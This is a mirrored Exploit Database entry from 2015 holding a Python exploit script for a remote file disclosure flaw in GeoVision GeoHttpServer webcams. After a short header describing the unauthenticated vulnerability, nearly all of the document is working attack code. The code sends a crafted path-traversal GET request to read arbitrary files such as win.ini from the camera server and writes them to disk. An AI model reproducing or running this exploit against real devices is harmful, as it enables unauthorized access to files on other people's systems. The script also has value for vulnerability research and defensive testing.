GeoVision (GeoHttpServer) Webcams – Remote File Disclosure

• Exploit Database
• 12 阅读

• 作者： Viktor Minin
  日期： 2015-06-10
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/37258/

• #!/usr/bin/python
  import os
  import sys
  import socket
  import binascii
  
  '''
  Title : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
  CVE-ID: none
  Product : GeoVision
  System		: GeoHttpServer
  Affected: 8.3.3.0 (may be more)
  Impact: Critical
  Remote: Yes
  Website link: http://www.geovision.com.tw/
  Reported: 10/06/2015
  Author: Viktor Minin, minin.viktor@gmail.com
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  No authentication (login) is required to exploit this vulnerability. 
  The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
  An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
  '''
  
  #os.system("cls")
  os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
  os.system('color 2');
  
  socket.setdefaulttimeout = 0.50
  os.environ['no_proxy'] = '127.0.0.1,localhost'
  CRLF = "\r\n"
  
  
  def main(): 
  	print "#######################################################################"
  	print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
  	print "# Usage: <ip> <port> <file>" 
  	print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini" 
  	print "#######################################################################"
  	exit()
  
  try:
  	url 	= sys.argv[1]
  	port 	= int(sys.argv[2])
  	#files 	= open(sys.argv[3],'r').read().split() 
  	file 	= sys.argv[3]
  except:
  	main()
  	
  def recvall(sock):
  	data = ""
  	part = None
  	while part != "":
  		part = sock.recv(4096)
  		data += part
  	return data
  
  def request(url, port, pfile):
  	PATH = str(pfile)	
  	HOST = url
  	PORT = port
  	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  	sock.connect((HOST, PORT))
  	sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
  	data = recvall(sock)
  	temp = data.split("\r\n\r\n")
  	sock.shutdown(1)	
  	sock.close()
  	return temp[1]
  
  ret = request(url, port, file)
  hex	= "".join("{:02x}".format(ord(c)) for c in ret)
  bin = binascii.unhexlify(hex)
  print ret
  file = open(file.replace('\\', '_'),"wb")
  file.write(bin)
  file.close()
  
  #~EOF